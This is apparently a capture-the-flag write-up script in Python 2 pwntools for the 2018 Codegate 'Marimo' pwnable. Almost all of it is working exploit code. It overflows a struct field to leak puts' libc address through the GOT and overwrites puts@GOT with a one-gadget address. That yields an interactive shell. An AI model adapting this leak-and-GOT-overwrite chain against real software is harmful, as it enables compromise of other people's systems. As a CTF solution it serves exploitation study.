[2018 Codegate] Marimo 본문
# Write-up script for the 2018 Codegate "Marimo" pwnable, written against
# Python 2 pwntools (print statements; str values are used as byte buffers).
# The interaction is a fixed send/recv protocol against the target's menu:
# every send is followed by a recvuntil(">>") so the next command lands on
# a fresh prompt read.  Hard-coded libc offsets below tie the script to the
# one libc build the author solved against.
from pwn import *


def smtm(s):
    """Drive the 'show me the marimo' menu entry, answering its two prompts with 'tmp'.

    Args:
        s: the pwntools tube to the target process.
    """
    s.send('show me the marimo\n')
    s.recvuntil(">>")
    s.send('tmp\n')
    s.recvuntil(">>")
    s.send('tmp\n')
    s.recvuntil(">>")


def mod(s, pay, sel):
    """Select entry `sel` (V), overwrite it via the modify option (M) with `pay`, then go back (B).

    Args:
        s: the pwntools tube to the target process.
        pay: payload string; a newline is appended before sending.
        sel: menu selection string, already carrying its trailing newline.
    """
    s.send('V\n')
    s.recvuntil(">>")
    s.send(sel)
    s.recvuntil(">>")
    s.send('M\n')
    s.recvuntil(">>")
    s.send(pay + '\n')
    s.recvuntil(">>")
    s.send('B\n')
    s.recvuntil(">>")


def view(s, sel):
    """Select entry `sel` (V) and return the 7 bytes printed after "name : " as a hex string.

    The 7 received bytes are NUL-padded to 8 and unpacked little-endian with
    u64(), so the 7th byte becomes the most significant byte of the value.
    The caller's split on '0xa' implies that byte is 0x0a (a newline
    following the leaked pointer) -- inferred from the parsing, not visible here.

    Args:
        s: the pwntools tube to the target process.
        sel: menu selection string, already carrying its trailing newline.

    Returns:
        hex() of the unpacked 64-bit value, e.g. '0xa7f...'.
    """
    s.send('V\n')
    s.recvuntil(">>")
    s.send(sel)
    s.recvuntil("name : ")
    res = hex(u64((s.recvn(7)) + "\x00"))
    s.send('B\n')
    s.recvuntil(">>")
    return res


# Local copy of the challenge binary; ELF() is used only to read the GOT slot.
b = '/home/goat/PROB/2018 Codegate/marimo'
elf = ELF(b)
s = process(b)

puts_got = elf.got['puts']
# 56 bytes of filler before the pointer that gets clobbered; the author's
# comment below names the target field bowl[1][2] (the profile pointer of
# the *next* entry), which this script cannot confirm on its own.
dummy = 'A' * 56
# Read primitive: the overwritten pointer is aimed at puts@GOT so that
# viewing entry 1 prints the resolved libc address of puts.
leak = dummy + p64(puts_got)
# Write primitive: same filler, a zero qword, then puts@GOT one slot further.
pay = dummy + p64(0x00) + p64(puts_got)

s.recvuntil(">>")
# Two entries are needed: entry 0 is overflowed, entry 1 is read/modified.
smtm(s)
smtm(s)
sleep(3)
mod(s, leak, '0\n')  # leak puts' libc addr
# view() yields '0xa' + 12 hex digits; drop the '0xa' prefix and parse the rest.
puts_addr = int((view(s, '1\n').split('0xa')[1]), 16)
# Offsets are specific to one libc build (puts symbol offset, one-gadget offset).
libc_base = puts_addr - 0x6f690
one_shot = libc_base + 0x45216
print '[+] Libc Base : ', hex(libc_base)
print '[+] OneShotGadget : ', hex(one_shot)
mod(s, pay, '0\n')  # overwrite bowl[1][2](profile -> *puts' got
# Final step is done inline rather than via mod(): unlike mod(), there is no
# recvuntil(">>") between the entry selection and 'M', and the raw 8-byte
# address is sent without a trailing newline.  A read-only GOT (full RELRO)
# would defeat this overwrite.
s.recvuntil(">>")
s.send('V\n')
s.recvuntil(">>")
s.send('1\n')
s.recvuntil("name : ")
s.send('M\n')
s.recvuntil(">>")
s.send(p64(one_shot))  # GOT Overwriting puts -> OneShotGadget
s.recvuntil(">>")
s.interactive()